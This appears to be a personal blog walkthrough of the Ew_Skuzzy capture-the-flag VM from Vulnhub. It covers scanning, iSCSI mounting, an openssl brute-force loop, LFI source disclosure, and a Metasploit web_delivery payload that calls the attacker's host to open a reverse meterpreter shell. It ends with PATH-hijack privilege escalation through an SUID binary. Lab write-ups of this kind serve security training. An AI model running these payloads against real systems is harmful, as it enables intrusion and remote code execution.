CTF Ew_Skuzzy from @vortexau (Vulnhub)

Ok i discovered that i love this CTF shit ahah!  I will try to crack Ew_Skuzzy from @vortexau You can find it on Vulnhub HERE.  As usual you can contact me on twitter @marghost.

First thing first nmap

root@kali:~# nmap -T4 -A -v 192.168.1.23

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-03-23 23:32 EDT
NSE: Loaded 140 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 23:32
Completed NSE at 23:32, 0.00s elapsed
Initiating NSE at 23:32
Completed NSE at 23:32, 0.00s elapsed
Initiating ARP Ping Scan at 23:32
Scanning 192.168.1.23 [1 port]
Completed ARP Ping Scan at 23:32, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:32
Completed Parallel DNS resolution of 1 host. at 23:32, 0.00s elapsed
Initiating SYN Stealth Scan at 23:32
Scanning 192.168.1.23 [1000 ports]
Discovered open port 80/tcp on 192.168.1.23
Discovered open port 22/tcp on 192.168.1.23
Discovered open port 3260/tcp on 192.168.1.23
Completed SYN Stealth Scan at 23:32, 0.06s elapsed (1000 total ports)
Initiating Service scan at 23:32
Scanning 3 services on 192.168.1.23
Completed Service scan at 23:34, 93.78s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.23
NSE: Script scanning 192.168.1.23.
Initiating NSE at 23:34
Completed NSE at 23:34, 0.10s elapsed
Initiating NSE at 23:34
Completed NSE at 23:34, 1.02s elapsed
Nmap scan report for 192.168.1.23
Host is up (0.00032s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 89:c2:ae:12:d6:c5:19:4e:68:4a:28:e9:06:bd:9c:19 (RSA)
|_  256 f0:0c:ae:37:10:d3:6d:a2:85:3a:77:04:06:94:f8:0a (ECDSA)
80/tcp   open  http    nginx
| http-methods:
|_  Supported Methods: GET HEAD
|_http-server-header: nginx
|_http-title: Welcome!
3260/tcp open  iscsi?
|_iscsi-info: ERROR: Script execution failed (use -d to debug)
MAC Address: 08:00:27:60:88:83 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Uptime guess: 0.000 days (since Thu Mar 23 23:33:47 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.31 ms 192.168.1.23

NSE: Script Post-scanning.
Initiating NSE at 23:34
Completed NSE at 23:34, 0.00s elapsed
Initiating NSE at 23:34
Completed NSE at 23:34, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.65 seconds
Raw packets sent: 1023 (45.806KB) | Rcvd: 1015 (41.290KB)

Ok so a webserver and something named iscsi.

Nikto said noting to me.

dirbuster medium 2.3 dictionary said noting to me.

dirb with the big.txt dico found some smblogin portal.  Everyting is forbitten and i cant seem to find things on it with google.  I keep this in mind.

root@kali:~# dirb http://192.168.1.23 /usr/share/dirb/wordlists/big.txt

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Fri Mar 24 00:40:35 2017
URL_BASE: http://192.168.1.23/
WORDLIST_FILES: /usr/share/dirb/wordlists/big.txt

-----------------

GENERATED WORDS: 20458

---- Scanning URL: http://192.168.1.23/ ----
==> DIRECTORY: http://192.168.1.23/smblogin/

---- Entering directory: http://192.168.1.23/smblogin/ ----
==> DIRECTORY: http://192.168.1.23/smblogin/custom-log/

---- Entering directory: http://192.168.1.23/smblogin/custom-log/ ----
==> DIRECTORY: http://192.168.1.23/smblogin/custom-log/refer/

---- Entering directory: http://192.168.1.23/smblogin/custom-log/refer/ ----
==> DIRECTORY: http://192.168.1.23/smblogin/custom-log/refer/del/

---- Entering directory: http://192.168.1.23/smblogin/custom-log/refer/del/ ----
==> DIRECTORY: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/

---- Entering directory: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/ ----
==> DIRECTORY: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/

---- Entering directory: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/ ----
==> DIRECTORY: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/

---- Entering directory: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/ ----
==> DIRECTORY: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/

---- Entering directory: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/ ----
==> DIRECTORY: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/

---- Entering directory: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/ ----
==> DIRECTORY: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/

---- Entering directory: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/ ----
==> DIRECTORY: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/

---- Entering directory: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/ ----
==> DIRECTORY: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/

---- Entering directory: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/ ----
==> DIRECTORY: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/

---- Entering directory: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/ ----

-----------------
END_TIME: Fri Mar 24 00:42:14 2017
DOWNLOADED: 286412 - FOUND: 0

Next i am investigating on the silly iscsi port 3260.  I do not know this but google does.  It seems to be a sort of file server that can be mounted.  Lets do that.

sudo apt-get install open-iscsi
nano /etc/iscsi/iscsid.conf (set node.startup to automatic)
root@kali:~# /etc/init.d/open-iscsi restart
[ ok ] Restarting open-iscsi (via systemctl): open-iscsi.service.
root@kali:~# iscsiadm -m discovery -t st -p 192.168.1.23
192.168.1.23:3260,1 iqn.2017-02.local.skuzzy:storage.sys0
root@kali:~# iscsiadm -m node
192.168.1.23:3260,1 iqn.2017-02.local.skuzzy:storage.sys0
root@kali:~# iscsiadm -m node --targetname "iqn.2017-02.local.skuzzy:storage.sys0" --portal "192.168.1.23:3260" --login
Logging in to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal: 192.168.1.23,3260] (multiple)
Login to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal: 192.168.1.23,3260] successful.

First Flag!! :

root@kali:~# cd /media/root/e0ca44be-b1ed-403a-84bd-db5558d6bb7e/
root@kali:/media/root/e0ca44be-b1ed-403a-84bd-db5558d6bb7e# ls
bobsdisk.dsk flag1.txt lost+found
root@kali:/media/root/e0ca44be-b1ed-403a-84bd-db5558d6bb7e# cat flag1.txt
Congratulations! You've discovered the first flag!

flag1{c0abc15976b98a478150c900ebb0c86f0327f4dd}

Let's see how you go with the next one...

Ok next into that mounted part i see a file named bobsdisk.dsk.  I will mount that as well to find out what it is :

root@kali:/media/root/e0ca44be-b1ed-403a-84bd-db5558d6bb7e# mkdir /bobsdisk
root@kali:/media/root/e0ca44be-b1ed-403a-84bd-db5558d6bb7e# mount -o loop bobsdisk.dsk /bobsdisk
root@kali:/media/root/e0ca44be-b1ed-403a-84bd-db5558d6bb7e# cd /bobsdisk/
root@kali:/bobsdisk# ls
lost+found ToAlice.csv.enc ToAlice.eml

Flag2 is inside ToAlice.eml with some clue.

PS: Oh, before I forget, the hacker-kid who told me how to use this new algorithm, said it was very important I used the command option -md sha256 when decrypting. Why? Who knows? He said something about living on the bleeding-edge...

PPS: flag2{054738a5066ff56e0a4fc9eda6418478d23d3a7f}

Ok so bobby here seems to want me to decrypt the csv file…. jeez decryption is not my cup of tea… so wikipedia tells me that the alg on october 2000 was aes-256-cbc.  I tried to decrypt with the flag as passphrase but suuuuure it didint work.  I sa on the message ROCKYOU in MAJ so i will use the rockyou.txt password list.  I need to try them all…

A little google search and i found a script that will do the job for me from http://stackoverflow.com/questions/25114571/decrypt-openssl-bruteforce

#!/bin/bash
# Build your list of candidates
PASSWORDS=$(cat "./rockyou.txt")

for PASSWORD in $PASSWORDS; do
openssl enc -d -aes-256-cbc -in ToAlice.csv.enc -out ToAlice.csv -md sha256 -k $PASSWORD 
RET=$? 

if [ $RET -eq 0 ]; then

cp ToAlice.csv ./working/ToAlice_$PASSWORD.csv

fi 
done

So after 16 hours… damnit XD i found hundreds of ToAlice_X.csv into the working file!

root@kali:~/decrypt/working# grep  "flag" ./*
./ToAlice_supercalifragilisticoespialidoso.csv:flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?

And i have the flag number 3. the csv file contain.

Web Path,Reason 
5560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site! 
c2444910794e037ebd8aaf257178c90b,Nice clean well prepped site. Nothing of interest here.
flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?

Going to the first path its a funcky website with a marquee ahah.
OkOk i will go and post the source to :p

<html>
<head>
<title>Hackers! They're everywhere!</title>
</head>
<body bgcolor="black" text="#00ff00">
<center>
<marquee width="50%"><font face="arial, helvetica" size="20">HACKER DETECTED! H$
<!-- Yeah, I'm bringing Marquee back, suckers! Just not in Chrome. Thanks, Google. Firefox is still rocking the marquee tag Ge$ -->
<img src="hacker.jpg" />
</center>
</body>
</html>

<!-- R2VvcmdlIENvc3RhbnphOiBbU291cCBOYXppIGdpdmVzIGhpbSBhIGxvb2tdIE1lZGl1bSB0dXJr ZXkgY2hpbGkuIApbaW5zdGFudGx5IG1vdmVzIHRvIHRoZSBjYXNoaWVyXSAKSmVycnkgU2VpbmZl bGQ6IE1lZGl1bSBjcmFiIGJpc3F1ZS4gCkdlb3JnZSBDb3N0YW56YTogW2xvb2tzIGluIGhpcyBi YWcgYW5kIG5vdGljZXMgbm8gYnJlYWQgaW4gaXRdIEkgZGlkbid0IGdldCBhbnkgYnJlYWQuIApK ZXJyeSBTZWluZmVsZDogSnVzdCBmb3JnZXQgaXQuIExldCBpdCBnby4gCkdlb3JnZSBDb3N0YW56 YTogVW0sIGV4Y3VzZSBtZSwgSSAtIEkgdGhpbmsgeW91IGZvcmdvdCBteSBicmVhZC4gClNvdXAg TmF6aTogQnJlYWQsICQyIGV4dHJhLiAKR2VvcmdlIENvc3RhbnphOiAkMj8gQnV0IGV2ZXJ5b25l IGluIGZyb250IG9mIG1lIGdvdCBmcmVlIGJyZWFkLiAKU291cCBOYXppOiBZb3Ugd2FudCBicmVh ZD8gCkdlb3JnZSBDb3N0YW56YTogWWVzLCBwbGVhc2UuIApTb3VwIE5hemk6ICQzISAKR2Vvcmdl IENvc3RhbnphOiBXaGF0PyAKU291cCBOYXppOiBOTyBGTEFHIEZPUiBZT1UK -->

PFFF noting interesting here the base64 translation :

George Costanza: [Soup Nazi gives him a look] Medium turkey chili. 
[instantly moves to the cashier] 
Jerry Seinfeld: Medium crab bisque. 
George Costanza: [looks in his bag and notices no bread in it] I didn't get any bread. 
Jerry Seinfeld: Just forget it. Let it go. 
George Costanza: Um, excuse me, I - I think you forgot my bread. 
Soup Nazi: Bread, $2 extra. 
George Costanza: $2? But everyone in front of me got free bread. 
Soup Nazi: You want bread? 
George Costanza: Yes, please. 
Soup Nazi: $3! 
George Costanza: What? 
Soup Nazi: NO FLAG FOR YOU

Ok so next i will go and challenge the other website at c2444910794e037ebd8aaf257178c90b.

I thinked i would be able to just redirect the reader to an url for a web_delivery, but it was not so easy. We need a key to do that.
After i tried to use LFI to get a php shell up and running but even if it is directly on the ressource i received an auth key demand. (HERE)
So i readed more about LFI and found that i can obtain a base64 version of the php pages that i want with this script. thanks phil at idontplaydart.

?p=php://filter/convert.base64-encode/resource=xxxxxx.php

First of all i think its not healty to be that obsessed with base64 @vortexau!

so with that i obtained the contant of flag.php and reader.php

once decrypted they look like
FLAG 4 flag.php

<?php defined ('VIAINDEX') or die('Ooooh! So close..'); ?>

<h1>Flag</h1>



Hmm. Looking for a flag? Come on... I haven't made it easy yet, did you think I was going to this time?

<img src="trollface.png" />
<?php // Ok, ok. Here's your flag! // // flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b} // // Well done, you're doing great so far! // Next step. SHELL! // // // Oh. That flag above? You're gonna need it... ?>

Reader.php

<?php defined ('VIAINDEX') or die('Ooooh! So close..'); ?>

<h1>Feed Reader</h1>

<?php
if(isset($_GET['url'])) {
    $url = $_GET['url'];
} else {
    print("<a href=\"?p=reader&url=http://127.0.0.1/c2444910794e037ebd8aaf257178c90b/data.txt\">Load Feed</a>");
}

if(isset($url) && strlen($url) != '') {

    // Setup some variables.
    $secretok = false;
    $keyneeded = true;

    // Localhost as a source doesn't need to use the key.
    if(preg_match("#^http://127.0.0.1#", $url)) {
        $keyneeded = false;
        $secretok = true;
    }

    // Handle the key validation when it's needed.
    if($keyneeded) {
        $key = $_GET['key'];
        if(is_array($key)) {
            die("Array trick is mitigated ;)");
        }
        if(isset($key) && strlen($key) == '47') {
        $hashedkey = hash('sha256', $key);
            $secret = "5ccd0dbdeefbee078b88a6e52db8c1caa8dd8315f227fe1e6aee6bcb6db63656";

            // If you can use the following code for a timing attack
            // then good luck 🙂 But.. You have the source anyway, right? 🙂 
        if(strcmp($hashedkey, $secret) == 0) {
                $secretok = true;
            } else {
                die("Sorry... Authentication failed. Key was invalid.");
        }

        } else {
            die("Authentication invalid. You might need a key.");
        }
    }

    // Just to make sure the above key check was passed.
    if(!$secretok) {
        die("Something went wrong with the authentication process");
    }

    // Now load the contents of the file we are reading, and parse
    // the super awesomeness of its contents!
    $f = file_get_contents($url);

    $text = preg_split("/##text##/s", $f);

    if(isset($text['1']) && strlen($text['1']) > 0) {
        print($text['1']);
    }

    print "

";

    $php = preg_split("/##php##/s", $f);

    if(isset($php['1']) && strlen($php['1']) > 0) { 
        eval($php['1']);
        // "If Eval is the answer, you're asking the wrong question!" - SG
        // It hurts me to write insecure code like this, but it is in the
        // name of education, and FUN, so I'll let it slide this time.
    }
}

Ok so here it is pretty straight foward. We need a 47 caracter key, in the flag.php it said we need this flag who it 47 car.
So i will build a special web_delivery for metasploit and we will surely get shell.
webdeliveryez.php

##php##
eval(file_get_contents('http://192.168.1.14:8080/LcuwBoqEb'));
print("workin");
##php##

Settin metasploit :

msf > use exploit/multi/script/web_delivery 
msf exploit(web_delivery) > set target 1
target => 1
msf exploit(web_delivery) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(web_delivery) > set uripath LcuwBoqEb
uripath => LcuwBoqEb
msf exploit(web_delivery) > set lhost 192.168.1.14
lhost => 192.168.1.14
msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.1.14:4444 
msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8080/LcuwBoqEb
[*] Local IP: http://192.168.1.14:8080/LcuwBoqEb
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.1.14:8080/LcuwBoqEb'));"

After just accessed the url :

http://192.168.1.23/c2444910794e037ebd8aaf257178c90b/?p=reader&key=flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}&url=http://192.168.1.14/webdeliveryphpez.php

Annnnnd we got a shell!

sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 2379 created.
Channel 0 created.
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@skuzzy:~/html/c2444910794e037ebd8aaf257178c90b$ 

Next we need to run some private escalation scripts.

I will save you the hussle of posting the full results here, i readed it all and i found something interesting

=================================================================================================
LINUX PRIVILEGE ESCALATION CHECKER
=================================================================================================

[*] GETTING BASIC SYSTEM INFO...

[+] Kernel
 Linux version 4.4.0-64-generic (buildd@lgw01-56) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #85-Ubuntu SMP Mon Feb 20 11:50:30 UTC 2017

[+] Hostname
 skuzzy

[+] Operating System
 __
 _____ _____ | |
 | __|_ _ _ | __|___ _ _ ___ ___ _ _| |
 | __| | | | |__ | _| | |- _|- _| | |__|
 |_____|_____| |_____|___|___|___|___|_ |__|
 |___|
 Intentionally Vulnerable VM! Do not expose to the Internet!
 Developed By - vortex
 twitter: @vortexau
 email: vortex@juicedigital.net
 Hints available at /dev/null (or ping me on Twitter)
 Assigned IP: 192.168.1.23/24

[*] GETTING NETWORKING INFO...
[+] SUID/SGID Files and Directories

 -rwsr-xr-x 1 root root 8736 Mar 2 22:56 /opt/alicebackup

Ok so here we see a script named alice backup that is runned with root priv..! lets fire it up:

www-data@skuzzy:/tmp$ /opt/alicebackup
/opt/alicebackup
uid=0(root) gid=0(root) groups=0(root),33(www-data)
ssh: Could not resolve hostname alice.home: Name or service not known
lost connection

Ok so interesting the script fire up id command, try to connect via ssh and die. If i poison the id process to fireup a shell, i think it would work.  So lets see

cp /bin/sh /tmp/id

And next add tmp at the start of the PATH so it will fire up mine insted of the real one.

www-data@skuzzy:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
www-data@skuzzy:/tmp$ echo $PATH
echo $PATH
/tmp:/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin:.
www-data@skuzzy:/tmp$ 

Exploit it end we see the FLAG 5


www-data@skuzzy:/tmp$ /opt/alicebackup
/opt/alicebackup
# whoami
whoami
root
# cd /root
cd /root
# ls
ls
flag.txt
# cat flag.txt
cat flag.txt
Congratulations!

flag5{42273509a79da5bf49f9d40a10c512dd96d89f6a}

You've found the final flag and pwned this CTF VM!

I really hope this was an enjoyable challenge, and that my trolling and messing with you didn't upset you too much! I had a blast making this VM, so it won't be my last!

I'd love to hear your thoughts on this one.
Too easy?
Too hard?
Too much stuff to install to get the iSCSI initiator working?

Drop me a line on twitter @vortexau, or via email vortex@juicedigital.net

Like a chief

M.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s